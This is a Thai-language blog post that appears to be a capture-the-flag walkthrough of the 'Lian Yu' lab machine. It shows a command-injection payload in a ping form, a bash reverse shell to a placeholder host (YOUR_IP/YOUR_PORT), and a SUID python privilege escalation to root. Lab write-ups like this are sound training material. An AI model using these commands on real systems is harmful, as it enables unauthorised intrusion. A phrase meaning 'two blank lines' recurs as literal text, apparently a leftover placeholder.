Posted inNote

ไขรหัสเกาะลึกลับ: ถอดบทเรียนการเจาะระบบในโลกไซเบอร์

Posted inNote

ไขรหัสเกาะลึกลับ: ถอดบทเรียนการเจาะระบบในโลกไซเบอร์

ในโลกของการแข่งขันเจาะระบบหรือ CTF (Capture The Flag) แต่ละภารกิจมักซ่อนความท้าทายและความลับไว้มากมายราวกับเกาะลึกลับที่รอการค้นพบ การผจญภัยในโลกไซเบอร์ครั้งนี้พาสำรวจ “Lian Yu” เกาะที่เต็มไปด้วยปริศนาและความปลอดภัยที่ต้องฝ่าฟันเข้าไป นับเป็นการจำลองสถานการณ์จริงที่ผู้เชี่ยวชาญด้านความปลอดภัยใช้ฝึกฝนทักษะ

การเดินทางเริ่มต้นจากการสำรวจหาทางเข้าที่มองไม่เห็น ไปจนถึงการควบคุมระบบทั้งหมด การเปิดเผยช่องโหว่เล็ก ๆ น้อย ๆ สามารถนำไปสู่การเปิดประตูบานใหญ่ได้เสมอ

สองบรรทัดว่าง

การสำรวจเบื้องต้น: สแกนหาประตูทางเข้า

ก่อนที่จะเจาะลึกเข้าไปในระบบใด ๆ การสำรวจเบื้องต้นเป็นขั้นตอนที่สำคัญที่สุดเสมอ เครื่องมืออย่าง Nmap ช่วยให้สามารถสแกนหาพอร์ตที่เปิดอยู่บนเซิร์ฟเวอร์เป้าหมายได้ ซึ่งเปรียบเสมือนการมองหาประตูหรือหน้าต่างที่เปิดทิ้งไว้ การค้นพบพอร์ต 22 (SSH) และ 80 (HTTP) บ่งชี้ว่ามีบริการเหล่านี้ทำงานอยู่

เมื่อพบพอร์ต HTTP สิ่งที่ต้องทำต่อไปคือการสำรวจเว็บแอปพลิเคชัน การใช้เครื่องมือสำหรับ Web Enumeration เช่น Dirb หรือ Gobuster เป็นสิ่งจำเป็น เพื่อค้นหาไดเรกทอรีหรือไฟล์ที่ซ่อนอยู่ซึ่งเจ้าของระบบอาจลืมไว้ ไดเรกทอรีที่ชื่อว่า /island ปรากฏขึ้นมาอย่างน่าสนใจ ซึ่งอาจเป็นจุดเริ่มต้นของความลับ

สองบรรทัดว่าง

เผยเส้นทางลับ: ช่องโหว่คำสั่งฉีด

เมื่อเข้าไปยังหน้าเว็บที่ซ่อนอยู่ภายใต้ /island พบกับหน้าเว็บที่มีช่องให้ป้อน IP เพื่อทำการ ping สิ่งนี้ดึงดูดความสนใจได้ทันที เพราะมักจะเป็นจุดที่เกิด Command Injection ได้ง่าย ๆ การลองป้อนค่าเช่น 127.0.0.1; ls -la เป็นการทดสอบเบื้องต้นเพื่อดูว่าระบบจะประมวลผลคำสั่งหลังเครื่องหมายเซมิโคลอนหรือไม่

และใช่ ระบบตอบสนองด้วยการแสดงรายการไฟล์และไดเรกทอรีในระบบ นี่คือการยืนยันว่าช่องโหว่ Command Injection มีอยู่จริง ซึ่งเป็นกุญแจสำคัญในการเจาะระบบในขั้นต่อไป

สองบรรทัดว่าง

ก้าวแรกสู่การควบคุม: การเรียก Shell ย้อนกลับ

ด้วยช่องโหว่ Command Injection ที่ยืนยันแล้ว ขั้นตอนต่อไปคือการได้ Reverse Shell ซึ่งหมายถึงการทำให้เซิร์ฟเวอร์เป้าหมายเชื่อมต่อกลับมายังเครื่องของเรา การใช้คำสั่งเช่น 127.0.0.1; bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1 ผ่านช่องป้อน IP จะเป็นการสั่งให้เซิร์ฟเวอร์เปิด Shell และส่งกลับมาให้เรา

เมื่อได้ Shell กลับมาสำเร็จ ก็เท่ากับว่าสามารถเข้าถึงระบบในระดับผู้ใช้งานทั่วไปได้แล้ว การสำรวจไฟล์ต่าง ๆ เพื่อค้นหา User Flag หรือข้อมูลที่เป็นประโยชน์จึงเริ่มขึ้น ซึ่งมักจะอยู่ในไดเรกทอรีของผู้ใช้งาน เช่น user.txt

สองบรรทัดว่าง

ยกระดับสิทธิ์: ไต่ระดับสู่ผู้ดูแล

การเข้าถึงระบบในฐานะผู้ใช้งานทั่วไปเป็นเพียงจุดเริ่มต้น เป้าหมายสุดท้ายคือการได้สิทธิ์สูงสุดหรือ Root Access การค้นหาช่องทางในการ Privilege Escalation จึงเป็นสิ่งสำคัญ เริ่มต้นด้วยการตรวจสอบไฟล์ที่มีสิทธิ์พิเศษ SUID (Set User ID) ด้วยคำสั่ง find / -perm -4000 2>/dev/null

จากการค้นพบ พบว่าโปรแกรม /usr/bin/python มีสิทธิ์ SUID นี่คือช่องโหว่ที่รู้จักกันดี การใช้เทคนิคจากเว็บไซต์ GTFOBins ช่วยให้สามารถยกระดับสิทธิ์ได้ทันที ด้วยคำสั่ง python -c 'import os; os.execl("/bin/sh", "sh", "-p")' ระบบจะเรียก Shell ใหม่ขึ้นมาพร้อมสิทธิ์ของ Root

สองบรรทัดว่าง

ปริศนาสุดท้าย: ไขความลับของเกาะ

เมื่อได้สิทธิ์ Root แล้ว การเข้าถึงทุกส่วนของระบบก็เป็นไปได้ ในที่สุดก็สามารถค้นพบ Root Flag ที่ซ่อนอยู่ ซึ่งเป็นรางวัลสูงสุดของการเจาะระบบครั้งนี้ การเดินทางบนเกาะ Lian Yu เผยให้เห็นว่าแม้ระบบจะดูแข็งแกร่งเพียงใด ก็ยังสามารถมีช่องโหว่ที่รอการค้นพบได้เสมอ

การเรียนรู้จากประสบการณ์เช่นนี้ทำให้เข้าใจถึงความสำคัญของการตรวจสอบความปลอดภัยอย่างละเอียด การสำรวจระบบอย่างเป็นขั้นตอน และการทำความเข้าใจกับช่องโหว่ที่พบ การผจญภัยในโลกไซเบอร์ยังคงดำเนินต่อไป ผู้ที่ฝึกฝนอย่างสม่ำเสมอเท่านั้นที่จะสามารถไขปริศนาที่ซับซ้อนเหล่านี้ได้

Tags: